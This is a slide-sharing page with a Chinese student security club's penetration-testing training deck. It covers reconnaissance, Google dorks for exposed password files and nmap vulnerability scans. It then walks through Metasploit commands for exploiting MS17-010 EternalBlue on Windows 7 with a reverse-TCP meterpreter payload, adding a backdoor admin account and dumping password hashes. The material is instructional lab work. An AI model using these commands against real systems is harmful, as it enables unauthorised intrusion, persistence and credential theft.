信息安全协会 网络安全专题第一期培训 © Copyright For ISA | www.rzisa.cn.

Slides:



Advertisements
Similar presentations
校园及周边治安防范 暨应急预案桌面演练 实 训 乐山应急管理学会 贾 伟. 目 录 校园治安问题包含的内容 校园治安问题的特点 避免引发校园治安问题的对策 校园应急预案桌面演练实训 校园治安问题的成因.
Advertisements

index 目次 ( 請按一下滑鼠,解答就會出現喔 !) 接續下頁解答 3-1 極限的概念.
教師網路素養與認知教師網路素養與認知 主講人:南投縣網 王登儀 時間地點:南投縣日月潭教師會館 時間地點:南投縣日月潭教師會館 主講人:南投縣網 王登儀 時間地點:南投縣日月潭教師會館 時間地點:南投縣日月潭教師會館
Internet & WWW 靜宜大學資訊工程學系 蔡奇偉 副教授 靜宜大學資訊工程學系 蔡奇偉 副教授.
第2章 黑客常用的系统攻击方法.
《计算机应用基础》 第七章 计算机网络基础与应用
福州职业技术学院图书馆 福州恒达通电子信息技术有限公司
大学计算机基础 主讲:张建国 电话: 实验及交作业网址:
网络常用命令.
104年特約藥局 相關業務說明 臺北業務組醫療費用二科 104年5月.
怎样利用搜索引擎检索网络资源 1. 网络的基础知识
祝贺您获得国家留学基金资助 请您登陆“国家留学网”查看《出国留学人员须知》,您在出国前及在外学习期间所需要办理的手续及具体流程,以及可能遇到的政策上疑问均在此《须知》上有所列明。
教育年鉴条目的撰写.
实际问题与一元二次方程(一).
了 解 从 Internet IP 开 始.
專題研究計畫經費使用重點說明 會計室 中華民國101年11月21日
汇报大纲 一、报送系统总体介绍 二、自查及检查评分报送流程 三、自查及检查方法及关键点 四、建议及注意事项.
一、會計循環之意義 二、會計憑證概要 三、日記簿概要 四、分類帳概要
北京教育资源服务平台培训 2008年3月13日.
搜索引擎的检索技巧.
2017/3/19 第一章 网络安全概述 1.
個人資料保護法簡介 報告人: 花蓮地檢署主任檢察官 許建榮.
计算机网络安全技术实验 启动虚拟机、GIF、measpoilt、.
科學與科技課程 教師分享會 二OO四年五月七日.
北京信联云通科技有限责任公司,版权所有 NRS2 使用方法 Copyright©2011 by Octopus Link.
了 解 Internet 从 ip 开 始.
俄语字母的发音体系 阅读规则.
会计技能综合实训 ——会计分工.
凤冈县网上名称管理 及网络红页建设 培 训 会 凤冈县编委办域名信息中心 2014年5月29日.
计算机系统安全 第10章 常用攻击手段.
我真的很不想活,日子過得太沒有意思了。. 我真的很不想活,日子過得太沒有意思了。 聽起來,你現在的日子真難熬,你 願意說說看為什麼嗎?
电话: 全省校园网网管培训 ——Windows 2000 Server 南京工业大学网络中心 崔北亮 电话:
老员工心态管理.
减免税管理系统 演示汇报 汉寿县地方税务局 王成名· 下面由我向各位介绍,减免税管理系统,请各位领导多提宝贵意见。
网络与信息安全 第一章 网络安全概述 1 沈超 刘烃 自动化-系统所 西安交通大学电信学院
第7章 计算机网络基础.
学习目标: 1)理解包和包过滤 2)理解包过滤的方法 3)设置特殊的包过滤规则
网络入侵初步.
利用 ISA Server 2004 建置應用層防護機制
郵件伺服器 MS 系列.
Windows 2003 Server IIS網站的架設
第3讲 网络安全协议基础 此为封面页,需列出课程编码、课程名称和课程开发室名称。
網路服務 家庭和小型企業網路 – 第六章.
【VA虚拟应用管理平台】专题培训 资源管理及个性化 陕西益和信息技术开发有限责任公司 2011年2月.
欢迎各位领导莅临胜利科技检查指导工作 安徽省公共电子阅览室 免费软件安装培训 全国公共文化发展中心安徽省级分中心 2014年09月.
Copyright © Dale Carnegie & Associates, Inc.
搜索引擎的使用技巧.
考试题型 填空题(30) 选择题(20) 名词解释(10) 问答题(24) 计算题(16) 附加题(30) 成绩核算:
第12章 远程访问、NAT技术.
2006「新進專任教師」研習營 研習營日期:95年4月11日(星期二)、 95年4月12日(星期三)
IPsec封装安全有效载荷.
目的:提升資訊安全的概念,透過課程觀念介紹及實務上的操作,建立病毒處理及保護電腦資料安全。
第2讲 网络安全协议基础 此为封面页,需列出课程编码、课程名称和课程开发室名称。
Web前端开发 第23章:网站发布 阮晓龙 / 河南中医药大学管理科学与工程学科
新网产品培训 MYDNS功能和使用.
第4章 TCP/IP应用层常用协议 4.1 Telnet 协 议 4.2 文件传输协议FTP 4.3 电子邮件的工作原理及其协议
VSB9网站群管理平台 系统管理.
VSB9网站群管理平台 系统管理.
【VA虚拟应用管理平台】专题培训 资源管理及个性化 陕西益和信息技术开发有限责任公司 2011年2月.
傳輸控制協議 /互聯網協議 TCP/IP.
重估價模式 如果一項不動產丶廠房及設備的公允價值能可靠地衡量,則企業可以選用重估價模式作為後續衡量的會計政策。 採重估價模式其帳面金額為:
大数据 西默路由器功能指导配置 上海西默通信技术有限公司
基于C#的.NETFramework 程序设计语言
【VA虚拟应用管理平台】专题培训 接入防火墙 陕西益和信息技术开发有限责任公司 2011年2月.
第10讲 Web服务.
FCN 组网案例1
王小桃 認識電子商務.
第1章 WWW和LAMP基本觀念.
作業系統的操作 2019/8/9 明誠中學編製.
第7章 Internet的应用.
Presentation transcript:

信息安全协会 网络安全专题第一期培训 © Copyright For ISA | www.rzisa.cn

授课目录 0x01.渗透测试理论 0x02.信息搜集 0x03.漏洞发现 0x04.漏洞攻击 0x05.持续控制 0x06.url-简述 © Copyright For ISA | www.rzisa.cn

0x01 渗透测试过程 1) 目标范围划定 2) 信息收集 3) 目标发现 4) 目标枚举 5) 漏洞映射 6) 社会工程学(可选) 7) 漏洞利用 8) 提权 9) 持续控制目标 10) 文档和报告 © Copyright For ISA | www.rzisa.cn

0x02 信息搜集 1.域名注册信息 命令:whois[选择参数][必要参数] eg:whois rzpt.cn © Copyright For ISA | www.rzisa.cn

0x02 信息搜集 2.DNS分析、IP获取 命令:ping [域名] dig [域名] host [域名] © Copyright For ISA | www.rzisa.cn

0x02 信息搜集 3.利用搜索引擎 google语法 “allinurl:login password “ "Index of /admin" "Index of /password" "Index of /mail" "Index of /" +passwd "Index of /" +password.txt 辅助网站: 站长之家:http://tool.chinaz.com/ 天眼查:https://www.tianyancha.com/ © Copyright For ISA | www.rzisa.cn

0x03 漏洞发现 1.漏洞扫描 nmap可以适用于winodws,linux,mac等操作系统。Nmap是一款非 常强大的实用工具,可用于: 检测活在网络上的主机(主机发现) 检测主机上开放的端口(端口发现或枚举) 检测到相应的端口(服务发现)的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性的漏洞(Nmap的脚本) © Copyright For ISA | www.rzisa.cn

nmap --script=vuln 192.168.0.xxx ·操作系统及常用端口扫描 nmap -O -PN 192.168.1.1/24 ·漏洞检测 nmap --script=vuln 192.168.0.xxx © Copyright For ISA | www.rzisa.cn

利用MS17-010漏洞入侵win7 接下来,就是翻车现场~ 0x04 漏洞攻击 MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 接下来,就是翻车现场~ © Copyright For ISA | www.rzisa.cn

0x04 漏洞攻击 配置exploit msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > set rhost 10.10.10.132 rhost => 10.10.10.132(被攻击) msf exploit(ms17_010_eternalblue) > show options 配置payload msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(ms17_010_eternalblue) > set lhost 10.10.10.131 lhost => 10.10.10.131(本机) msf exploit(ms17_010_eternalblue) > exploit © Copyright For ISA | www.rzisa.cn

win7 shell 获取管理员hash 0x05 持续控制 net user net user hacker hacker /add net localgroup administrator hacker /add 获取管理员hash hashdump 令牌冒充,上马(不演示) © Copyright For ISA | www.rzisa.cn

0x06 url访问简述 1.DNS 解析:将域名解析成 IP 地址 2.TCP 连接:TCP 三次握手 3.发送 HTTP 请求 5.浏览器解析渲染页面 6.断开连接:TCP 四次挥手 © Copyright For ISA | www.rzisa.cn

URL: (Uniform Resource Locator),统一资源定位符,用于定位互联网上资源,俗称网址。 0x06 URL访问简述 URL: (Uniform Resource Locator),统一资源定位符,用于定位互联网上资源,俗称网址。 scheme://host.domain:port/path/filename © Copyright For ISA | www.rzisa.cn

DNS:baidu.com 220.114.23.56 80 0x06 url访问简述 © Copyright For ISA | www.rzisa.cn

翻车完毕 © Copyright For ISA | www.rzisa.cn